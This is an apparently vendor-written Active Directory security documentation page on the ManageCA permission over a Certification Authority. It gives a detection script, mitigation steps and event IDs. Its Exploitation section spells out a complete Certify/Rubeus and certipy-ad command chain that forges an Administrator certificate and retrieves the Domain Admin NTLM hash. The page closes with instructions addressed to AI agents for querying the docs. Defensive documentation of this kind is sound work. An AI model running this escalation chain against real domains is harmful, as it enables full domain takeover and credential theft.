# ManageCA ## Summary | | | | -------------------------- | ------------------------ | | **FSProtect ACL Alias** | ManageCA | | **Affected Object Types** | CertificationAuthorities | | **Exploitation Certainty** | Certain | ## Description The `ManageCA` permission in a Certificate Authority (CA) environment allows an account to control CA operations. This includes tasks such as issuing, revoking, and renewing certificates, managing certificate templates, and updating CA configuration settings. It is essential for CA administrators to maintain the integrity of the Public Key Infrastructure (PKI) by ensuring that certificates are correctly managed and secure. If the `ManageCA` permission is misconfigured, it can introduce significant security risks. An attacker with this permission can issue fraudulent certificates, revoke legitimate ones, or modify CA settings to bypass security controls. These actions could undermine trust in the CA, enabling the attacker to impersonate trusted entities, intercept secure communications, or gain unauthorized access to network resources. ## Identification ### PowerShell #### Active Directory & PSPKI Modules Using the ActiveDirectory and PSPKI PowerShell modules, you can identify ManageCA permissions on Certification Authorities in the domain. Function: Find-ManageCA ```powershell function Find-ManageCA { [CmdletBinding()] param ( [string]$ComputerDN = $null,[string]$OutputPath = "ManageCA.csv") foreach ($module in @("ActiveDirectory", "PSPKI")) { if (-not (Get-Module -Name $module)) { Write-Host "Attempting to load $module module..." try { Import-Module $module -ErrorAction Stop Write-Host "$module module loaded successfully." } catch { Write-Error "Failed to load $module module. Please ensure it is installed." return } } } # Access Control Type (Allow) $AccessControlType = [System.Security.AccessControl.AccessControlType]::Allow $results = @() try { if ($ComputerDN) { Write-Host "Scanning specific Certification Authority: $ComputerDN" $ComputerName = (Get-ADComputer -Identity $ComputerDN -Properties dNSHostName | Select-Object -ExpandProperty dNSHostName) $targetComputers = @($ComputerName) } else { Write-Host "Scanning all Certification Authorities in the domain..." $targetComputers = Get-ADComputer -Filter * -Properties dNSHostName | Select-Object -ExpandProperty dNSHostName } foreach ($ComputerName in $targetComputers) { try { Get-CertificationAuthority -ComputerName $ComputerName | Get-CertificationAuthorityAcl | Select-Object -ExpandProperty Access | Where-Object { $_.AccessControlType -eq $AccessControlType -and $_.Rights -like "*ManageCA*" -and $_.IsInherited -eq $false } | ForEach-Object { $results += [PSCustomObject]@{ "Vulnerable CA" = $ComputerName "Internal Threat" = $_.IdentityReference } } } catch {Write-Warning "Error scanning CA on $ComputerName : $($_.Exception.Message)" } } } catch { Write-Error "Unexpected error during CA scan: $($_.Exception.Message)" return } if ($results.Count -gt 0) { try { $results | Export-Csv -Path $OutputPath -NoTypeInformation -Encoding UTF8 Write-Host "Results exported successfully to '$OutputPath'" } catch { Write-Error "Failed to export results to CSV: $($_.Exception.Message)" } } else { Write-Host "No ManageCA permissions found." } } ``` Usage Examples: **1.** Scan all Certification Authorities in the domain ```powershell Find-ManageCA ``` **2.** Scan a specific CA server by Distinguished Name ```powershell Find-ManageCA -ComputerDN "CN=FSCA01,CN=Computers,DC=forestall,DC=labs" ``` **3.** Save results to a custom file path ```powershell Find-ManageCA -OutputPath "C:\Temp\ManageCA_Results.csv" ``` #### Certification Authority Console (GUI) **1.** Open the Certification Authority management console (certsrv) on your CA server. **2.** Right-click the CA server name and choose Properties. **3.** Go to the Security tab. **4.** Locate the Access Control Entry (ACE) for the user or group you want to review. **5.** In the permissions list, check whether the ManageCA permission is set. **6.** Click OK to save and close. ![certsrv](/files/oNKESITrQk4Ib7bBKS8H) ## Exploitation The ManageCA permission provides an attacker with full administrative control over the Certification Authority (CA). ### Windows #### Add our user as officer ```powershell .\Certify.exe manage-ca --officer --ca '' ``` Example: ```powershell .\Certify.exe manage-ca --officer S-1-5-21-3838874360-3982899950-1830233728-1108 --ca 'DC.Forestall.labs\Forestall-ROOT-CA' ``` ![Add our user as officer](/files/6kvgUCrv4nhHuGzCtaLZ) ![get sid of current user](/files/BddNxml88dtJaVRoPYUS) #### Enable by default ESC01 vulnerable SubCA template ```powershell .\Certify.exe manage-ca --ca '' --template subca ``` Example: ```powershell .\Certify.exe manage-ca --ca 'DC.Forestall.labs\Forestall-ROOT-CA' --template subca ``` ![Enable by default ESC01 vulnerable SubCA template](/files/WPCHRQdTV5mVDyPF8exZ) #### Request a certificate from SubCA ```powershell .\Certify.exe request --ca '' --template subca --upn "Administrator@" ``` Example: ```powershell .\Certify.exe request --ca 'DC.Forestall.labs\Forestall-ROOT-CA' --template subca --upn "Administrator@" ``` ![Request a certificate from SubCA](/files/wGSYKawe6nZ9GqgRCOml) #### Issue the failed request ```powershell .\Certify.exe manage-ca --issue-id '' --ca '' ``` Example: ```powershell .\Certify.exe manage-ca --issue-id 103 --ca 'DC.Forestall.labs\Forestall-ROOT-CA' ``` ![Issue the failed request](/files/eUa8cfnimXm5Glk3qZCK) #### Retrieve the issued certificate ```powershell .\Certify.exe request-download --ca '' --id '' --private-key '' ``` Example: ```powershell .\Certify.exe request-download --ca 'DC.Forestall.labs\Forestall-ROOT-CA' --id 103 --private-key 'LS0t[snip..]0tDQo=' ``` ![Retrieve the issued certificate](/files/KhGSOPuO6rGjbBuy6fPp) #### Retrieve Domain Admin NTLM hash ```powershell .\Rubeus.exe asktgt /user:administrator /getcredentials /enctype:aes256 /certificate: ``` Example: ```powershell .\Rubeus.exe asktgt /user:administrator /getcredentials /enctype:aes256 /certificate:MIACA[snip..]AAAA ``` ![Retrieve Domain Admin NTLM hash](/files/JD8hjgMsHAGSSvXVwiTJ) ![Retrieve Domain Admin NTLM hash](/files/afKxABUFw92zo081XRO2) ### Linux #### Add our user as officer ```bash certipy-ad ca -u @ -p '' -ca '' -target -add-officer ``` Example: ```bash certipy-ad ca -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -target 192.168.100.128 -add-officer 'adam' ``` ![Add our user as officer](/files/cEV9JiaxwbJ2GKTOvmhi) #### Enable by default ESC01 vulnerable SubCA template ```bash certipy-ad ca -u @ -p '' -ca '' -target -enable-template 'SubCA' ``` Example: ```bash certipy-ad ca -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -target 192.168.100.128 -enable-template 'SubCA' ``` ![Enable by default ESC01 vulnerable SubCA template](/files/dW5iK0LnevbJanTBzZrJ) #### Request a certificate from SubCA ```bash certipy-ad req -u user>@ -p '' -ca '' -template subca -target -upn administrator@ ``` Example: ```bash certipy-ad req -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -template subca -target 192.168.100.128 -upn administrator@forestall.labs ``` ![Request a certificate from SubCA](/files/ijYeXQ1nJqvuNGsQb5DZ) #### Issue the failed request ```bash certipy-ad ca -u user>@ -p '' -ca '' -target -issue-request ``` Example: ```bash certipy-ad ca -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -target 192.168.100.128 -issue-request 99 ``` ![Issue the failed request](/files/6JgHvd2z1pHz4fEGLAV6) #### Retrieve the issued certificate ```bash certipy-ad req -u user>@ -p '' -ca '' -template subca -target -upn administrator@ -retrieve ``` Example: ```bash certipy-ad req -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -template subca -target 192.168.100.128 -upn administrator@forestall.labs -retrieve 99 ``` ![Retrieve the issued certificate](/files/3WgqAw0mZmLZKRAuzJCa) #### Retrieve Domain Admin NTLM hash ```bash certipy-ad auth -pfx administrator.pfx -username administrator -domain -dc-ip ``` Example: ```bash certipy-ad auth -pfx administrator.pfx -username administrator -domain forestall.labs -dc-ip 192.168.100.128 ``` ![Retrieve Domain Admin NTLM hash](/files/MSVcR2cFB8CpDUHyrH1g) ## Mitigation To reduce the risk associated with ManageCA, follow the steps below: **1.** Open the Certification Authority management console (certsrv) on the CA server. **2.** Right-click the CA server name and choose Properties. **3.** In the Properties window, go to the Security tab. **4.** In the Security settings, locate and select the Access Control Entry (ACE) for the user or group you want to configure. **5.** In the permissions list, remove the ManageCA permission if it is not required. **6.** Click OK to save the changes. ![certsrv](/files/oNKESITrQk4Ib7bBKS8H) ## Detection Adding new Access Control Entries (ACEs) to Active Directory objects changes the object's `ntSecurityDescriptor` attribute. These changes can be detected by monitoring relevant event IDs such as 5136 and 4662. | Event ID | Description | Fields/Attributes | References | | -------- | --------------------------------------------------------- | ---------------------- | ---------------------------------------------------------------------------------------------------------------------- | | 5136 | A directory service object was modified. | ntSecurityDescriptor | | | 4662 | An operation was performed on an object. | AccessList, AccessMask | | | 4882 | The security permissions for Certificate Services changed | Permission | | ## References * [AD Certificates - CyberArk Docs](https://docs.cyberark.com/identity/latest/en/content/coreservices/connector/ad-certificates.htm) * [Configure Server Certificate Autoenrollment - Microsoft Docs](https://learn.microsoft.com/en-us/windows-server/networking/core-network-guide/cncg/server-certs/configure-server-certificate-autoenrollment) * [The Hacker Recipes – ADCS Access Controls](https://www.thehacker.recipes/ad/movement/adcs/access-controls) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/ad/manageca.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.